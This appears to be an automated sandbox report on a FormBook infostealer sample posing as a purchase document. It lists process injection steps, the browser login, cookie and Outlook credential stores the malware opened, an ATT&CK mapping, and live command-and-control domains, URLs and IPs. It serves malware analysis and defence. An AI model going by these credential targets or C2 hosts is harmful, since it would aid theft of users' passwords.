            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerLi
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945952905.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932102423.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934597630.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63930276330.0000000001104000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933466408.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933878407.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932231287.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934304850.0000000001116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572660 Sample: ACQUISITION OF A   CONSERVA... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 28 www.y6h6kn.top 2->28 30 www.telepzow.fit 2->30 32 8 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 5 other signatures 2->48 10 ACQUISITION OF A   CONSERVATIVE REFRIGERATOR.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 EIyKLgVzlk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 xwizard.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 EIyKLgVzlk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 thesnusgang.fun 84.32.84.32, 49756, 49757, 49758 NTT-LT-ASLT Lithuania 22->34 36 www.freshteps.life 209.74.79.41, 49772, 49773, 49774 MULTIBAND-NEWHOPEUS United States 22->36 38 3 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe27%ReversingLabsWin32.Trojan.AutoitInject
            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.thesnusgang.fun/z4qr/0%Avira URL Cloudsafe
            http://www.telepzow.fit/oizn/100%Avira URL Cloudphishing
            http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA=100%Avira URL Cloudphishing
            http://www.dnft.immo/yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH40%Avira URL Cloudsafe
            http://www.deadshoy.tech/0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY=0%Avira URL Cloudsafe
            http://www.deadshoy.tech/0sq9/0%Avira URL Cloudsafe
            http://www.freshteps.life/qp01/0%Avira URL Cloudsafe
            http://www.thesnusgang.fun/z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH40%Avira URL Cloudsafe
            http://www.freshteps.life0%Avira URL Cloudsafe
            http://www.y6h6kn.top/jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH40%Avira URL Cloudsafe
            http://www.dnft.immo/yeky/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.freshteps.life
            		209.74.79.41
            		truetrue
              		unknown
              www.cifasnc.info
              		172.67.128.109
              		truetrue
                		unknown
                www.y6h6kn.top
                		162.251.95.62
                		truetrue
                  		unknown
                  94950.bodis.com
                  		199.59.243.227
                  		truefalse
                    		high
                    www.deadshoy.tech
                    		199.59.243.227
                    		truetrue
                      		unknown
                      www.telepzow.fit
                      		104.21.64.208
                      		truetrue
                        		unknown
                        thesnusgang.fun
                        		84.32.84.32
                        		truetrue
                          		unknown
                          www.cruycq.info
                          		47.83.1.90
                          		truetrue
                            		unknown
                            www.thesnusgang.fun
                            		unknown
                            		unknownfalse
                              		unknown
                              www.dnft.immo
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.thesnusgang.fun/z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA=true
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.telepzow.fit/oizn/true
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.y6h6kn.top/jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.dnft.immo/yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.thesnusgang.fun/z4qr/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.deadshoy.tech/0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.deadshoy.tech/0sq9/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.freshteps.life/qp01/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.dnft.immo/yeky/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.comxwizard.exe, 00000004.00000002.65195625577.0000000005FEC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196526701.0000000007D20000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65195625577.0000000005E5A000.00000004.10000000.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoxwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabxwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drfalse
                                        		high
                                        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchxwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=X0a-0531.4.drfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoxwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drfalse
                                              		high
                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drfalse
                                                		high
                                                http://www.freshteps.lifeEIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=X0a-0531.4.drfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://gemini.google.com/app?q=xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        209.74.79.41
                                                        		www.freshteps.lifeUnited States
                                                        		31744MULTIBAND-NEWHOPEUStrue
                                                        104.21.64.208
                                                        		www.telepzow.fitUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        199.59.243.227
                                                        		94950.bodis.comUnited States
                                                        		395082BODIS-NJUSfalse
                                                        84.32.84.32
                                                        		thesnusgang.funLithuania
                                                        		33922NTT-LT-ASLTtrue
                                                        162.251.95.62
                                                        		www.y6h6kn.topUnited States
                                                        		26484IKGUL-26484UStrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1572660
                                                        Start date and time:2024-12-10 18:45:37 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 4s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Potential for more IOCs and behavior
                                                        Number of analysed new started processes analysed:5
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/5@8/5
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        12:48:48API Interceptor3953933x Sleep call for process: xwizard.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.21.64.208063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        DHL- Shipping invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                        POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                        PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                        New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • artemis-rat.comartemis-rat.com:443
                                                        199.59.243.227PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                        • ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                        Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                        • www.solar-quotes.click/ubu8/
                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                        • www.whisperart.net/27s6/
                                                        QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                        • www.sfantulandrei.info/wvsm/
                                                        lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                        • www.bcg.services/5onp/
                                                        New quotation request.exeGet hashmaliciousFormBookBrowse
                                                        • www.bcg.services/5onp/
                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                        • www.acond-22-mvr.click/9qaj/
                                                        ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                        • www.dating-ml-es.xyz/pvrm/
                                                        bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        • www.sql.dance/9p84/
                                                        SW_5724.exeGet hashmaliciousFormBookBrowse
                                                        • www.whisperart.net/27s6/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        94950.bodis.comSHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        PI916810.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        PO23100072.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        www.cifasnc.infobestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        • 172.67.128.109

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSl92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 172.64.41.3
                                                        qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 172.64.41.3
                                                        taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 172.64.41.3
                                                        Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                        • 172.64.41.3
                                                        CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 104.21.64.1
                                                        XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 104.21.64.1
                                                        https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                        • 172.67.145.201
                                                        9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                        • 162.159.140.238
                                                        Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.6
                                                        UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                        • 172.66.0.236
                                                        BODIS-NJUSPURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                        • 199.59.243.227
                                                        Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                        • 199.59.243.227
                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        New quotation request.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 199.59.243.227
                                                        ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.227
                                                        MULTIBAND-NEWHOPEUSPO2412010.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.108
                                                        SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.64.190
                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
                                                        UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
                                                        Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.109
                                                        PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                        • 209.74.77.107
